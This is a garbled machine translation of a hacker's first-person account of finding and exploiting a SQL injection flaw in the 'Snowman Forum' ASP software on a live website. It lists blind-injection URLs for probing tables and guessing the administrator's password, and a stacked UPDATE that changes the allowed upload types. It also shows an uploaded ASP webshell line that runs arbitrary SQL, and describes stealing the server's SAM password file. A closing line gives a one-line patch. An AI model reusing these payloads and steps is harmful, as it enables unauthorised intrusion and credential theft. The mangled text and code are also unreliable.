First, foreword measures:
Yesterday, when I was selected, I watched the Way of December - I had an idea for writing a discovery of the forum vulnerability. It later found that the more famous forums were found in the predecessors at the time of the Internet. At this time, 1 friend sent a "Modified Snowman Forum". Now discover this vulnerability and use this vulnerability invasion. If you have any questions, please discuss www.cnwill.com. .
Second, the discovery process of the vulnerability:
Script, is also a script, I am still more interested in this thing. I have been a long time, I didn't go to invade. Because the company is busy, I found an official BBS website and test him. First, I Open your own scanner and scan the website! The port came out: 21 80 1433 can be used only so much! In fact, just grab a hole, I will give me a hole! ! FTP is used by Server_u to improve the permissions. But now I haven't got any shell.1433 mssql, and the invasion of the five-flowers of the eighth door. After the impact wave, I rarely see 135. It is estimated that SP4 is played.
Well, try FTP anonymous can not be enabled. I have been lucky. I am no exception this time, I didn't go in. Haha let everyone down! Let's see 1433 There is no weak mouth today, I sweep ing !!!! The result will let everyone disappoint, and let me down !!!!!!!!!!!!!!! It may be SP3. The problem is that there is no SQL SP3 overflow program. Will it? Oh, why do you want to give up, the story just started! ! !
Now there is no vulnerability in his website script, there is only one forum above, there is no other than anything. At present, you can't find the vulnerability information of this forum, at least I don't know. It may be that it is only a general general. It is really a little witch than the moving network. I found a place to offer a free version of the download in his forum. The outlet opened 1433. It should be 90% of this forum. The machine rate used the MSSQL database.
Oh, if I let me find a SQL injection vulnerability, hey, the opportunity is big. Come, download his free version! Open the ASP source code to find vulnerabilities, I like to click on the smoke, I don't know why It seems that I have been accustomed to this feeling. Looking for a vulnerability is inseparable from cigarettes D. If it is not inspired. The process of boring the loopholes is really annoying.
The Snowman Forum Requirements: Windows NT Host Access / SQL Server2000 Database, all on the web is for Access. First download a new SF2.0 for Access version, then open all ASP code for **. ASP? ID = ** to view .editPost.asp and other files.
I have read 13 ASP files, I don't have a little gain. But I am looking for a vulnerability. I don't like it. It is not my practice. I like to challenge. When I just opened the next ASP file, the phone rang, my girlfriend hit Come. Tell me at night, accompany him to watch movies. Say "there is no Demonii III" out, I personally prefer to watch Liu Dehu, "full-time killer" is still alive! So I quickly agreed. See 8:00 in the evening! Put your phone, there are two hours, first analyze the code, so I started to see the code. Find a statement of his filtration parameters, looked at it, this [chksql] filtered the single quotes for the submitted ID. The following is the [ISNUMERIC] is not a number]. Wow! This obviously filters the vulnerability, but [editpost.asp] programmers mistaken, almost did not let me laugh! It's filtered, it's too head!
Third, the principle of vulnerability: err = falsepostid = Chksql ("postid")) if not isnumeric (postidid) Then 'determines whether an object is a number, return to the Boolean value / No ^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^ // This is the statement that produces a vulnerability. . 'Multi-Mathematical settings should be safe, postidid can only pass. But here is a place' isNumeric is filtering "postidid", but is really "postid". So here POSTID did not do any 'filtering, we can boldly maliciously query the administrator in the database password in Err = TrueelseSTRSQL = "Select * from sf_post where postid =" & postidSet = conn.execute (strsql) if ife2.bof or rs2 .eof thenerr = trueelseposttitle = rs2 ( "title") threadid = rs2 ( "threadid") userid = rs2 ( "userid") strSql = "select * from sf_thread where visible = 1 and threadid =" & threadidSet rs2 = Conn.Execute (Strsql) if xi = = trueelsethreadtitle = RS2 ("Title") forumid = RS2 ("forumID") open = rs2 ("open") end ingnd.asp and other files Have this vulnerability but he judges the parameters to find the wrong object! ! Ha, it is equivalent to no judgment. A small vulnerability, looking for me to catch it. Let's start. Starting again! Fourth, detailed intrusion process for access version http://cnwill.com/editpost.asp?postid=513 or 0 <> (Select Count (*) from sf_user) Query if there is a sf_user table http://cnwill.com/editpost .asp? Postid = 513 and 0 <> (Select Count (*) from sf_user where username <> ') querying if there is a UserName column http://cnwill.com/editpost.asp?postid=513 and 0 <> (Select Count (*) from sf_user where password <> ') querying whether there is a Password column in the sf_user table
Query administrator password http://cnwill.com/editpost.asp?postid=513 and exists (select min (userid) from sf_user where left (password, 1) = 'c' and userid = 1) MIN (userID) is The minimum ID can also be replaced with max (userid) maximum ID. And userid = 1 is the ID number of the administrator in the sf_user table. LEFT is the left guess code of the heavy password column. http://cnwill.com/editpost.asp?postid=513 and exists (SELECT Min (userid) from sf_user where left (password, 2) = 'cn' and userid = 1) In order to guess (if you guessed, Page can be implemented normally) Guess administrator user name length http://cnwill.com/editpost.asp?postid=513 and exists (useerid) from sf_user where len (username) = 8 and userid = 1)
Guess administrator password length http://cnwill.com/editpost.asp?postid=513 and exists (SELECT MIN (userid) from sf_user where len (password) = 16 and userid = 1) Password with MD5 plus secret 16-bit
Guess the MD5 plus the secret code to put the high-speed broiler on the high-speed broiler ... I will not pay attention to the security of the password. There is always an administrator's password to be very easy to guess.
5. Examline the intrusion process for MSSQL version
(1) For the result of the above scan, I believe that the system administrator is definitely not SB. So I believe xp_cmdshell has been Del. And the security of the website may be relatively high. Just through this small vulnerability, our performance is performed. Let's make actions, open the IE to enter: http://www.cnwill.com/bbs/po.asp? Pxid = 523 and 1 = 1 Return to normal, it seems that the vulnerability is really existent. The following process makes me bitter and bitter. In the downloaded Access library, I found the user table. I saw a field in the user table to distinguish between the reception administrator. Then on his website I found a administrator's ID number, test it. Http://www.cnwill.com/bbs/po.asp? Pxid = 523 and 0 <> (Select Count (*) from xxx_user where username> 0 And flag = 4 and userid = 1) IE returns, find the xxx_user table. Oh, it seems that the people of the official website are not SB. It feels, the background management path may also be changed. Test it. Sure enough, it has been changed. The invasion route is completely sealed. The plan failed, we use B plans! (2) The B plan is that we only use a cross-library query to explode his table name, then continue to be injected! I got a smoke. I believe this time will successfully get his real table name, because used previously The cross-library query explosion table name is successful. Two minutes, I got all the library names in the database, analyzed it, identify the library name used by its BBS. Then I blast in the table name in this library. The volume is big. When you think of the report name, you will use single quotes. The other party is filtered by single quotes. I use SQL encoding. I put a single quotes. I got the first table name .xxx_yy_setsys. There is a xxx_setsys table name in the library I downloaded. More than one yy compared. If you let you guess, do he have all the table names add a yy? You will definitely test it, right, I am also tested with you. Change the statement that just tests the vulnerability, I succeeded. This time I burst the name of the front desk administrator in IE. Oh, come to see the password, burst, MD5. Another MD5 code. I don't like to burst into a password. Because it takes a long time, the administrator password for the official website. I don't dare to use social engineering to guess. So I just want to find other roads. (3) FSO, you should be very familiar. The forum supports uploading documents. However, when he posted, he judged the file extension. How did I bring my ASP Trojan to him? How to write his ASP source code. Analysis, he uses a table to save the expansion name of the uploaded file. If the name you upload is not in the table, then you can't upload it. It seems that we only change the records in his table. The default can be uploaded to: JPG, GIF, RAR, ZIP. I selected a RAR file, we can upload this RAR change to ASP. When using MSSQL's UPDATE statement, I encountered a problem, when changing his record, use SQL encoding because there is a single quotes. I didn't succeed this time. At the same time, I will soon think of another way! I will register a user name called ASP.
Then use the SELECT statement to get this username to write to him, will not use single quotes, ha! When you register, this user already exists, ok, I take the length: Aspxasp this success. I submitted the following statement: http://www.cnwill.com/bbs/po.asp? Pxid = 523; Update UPLOADFILE SET EXEFILENAME = SUBSTRING (Select User from xxx_yy_setsys where userid = 74852), 1, 3) Where ascii (Substirng (exefilename, 1, 1)) = 114 - Oh, no error, it seems that most of them have been successful, Ok, change the statement to explode his settings, my dear IE, I love you very much, haha, IE the ASP word in IE. Prove that I have succeeded. I can't be happy too early, because the story just entered the development class, I have to upload an ASP Trojan soon, in order not to let the administrator discovery, I have to change the settings at the fastest speed. Everything is in planning. I am uploaded Trojan, then add a ASP file inside, directly execute everything SQL statement! .... cmd = trim (Request ("Chou")) IF cmd <> "" Thenn.execute cmdend IF I use this file, turn the settings back, delete my registered account. At the same time, put the horse wood Copy to a hidden place! Then put the patch for his forum, hey, it is deleted two characters, he filter the wrong parameters. The B plan is successful. Ok, it's easy. (4) View server information, try to improve your permissions, get system administrator privileges, now we have got a Webshell, let us first see the server_u local improvement permissions. Hey, it's not good, there is no write authority. Change the configuration file! MSSQL played SP3. The service is so much. Well, first look at the procedure he installed, what is something. In the program directory, suddenly, a program folder makes my eyes bright, hehe! ! I sent a pcanywhere directory. TNND, no open 5631. It may be previously installed. Then stop the service. Don't take a look at there is no CIF file! ! Query the * .cif file. So fast, there is only one default. Nothing at all. It is a white fee. However, I believe that there will be a way to rise. Let's put a song to listen, awake your own thinking! ! Open Music "The heart is not very" rhythm! ! ! Point a smoke, enjoy it! ! ! ! At the same time, I downloaded his SAM file. Put it to my super high-speed invincible meat machine to run Password. Time is coming to 8 o'clock. I have to go to the girlfriend to watch movies! OK, let's let go. I have closed Computer. Put on the coat, romantic! ! ! Friends, etc. meeting! ! ! :) Six, the vulnerability patch is in the editpost.asp and other files, replace if not isnumeric (postid) The statement can patch this vulnerability.
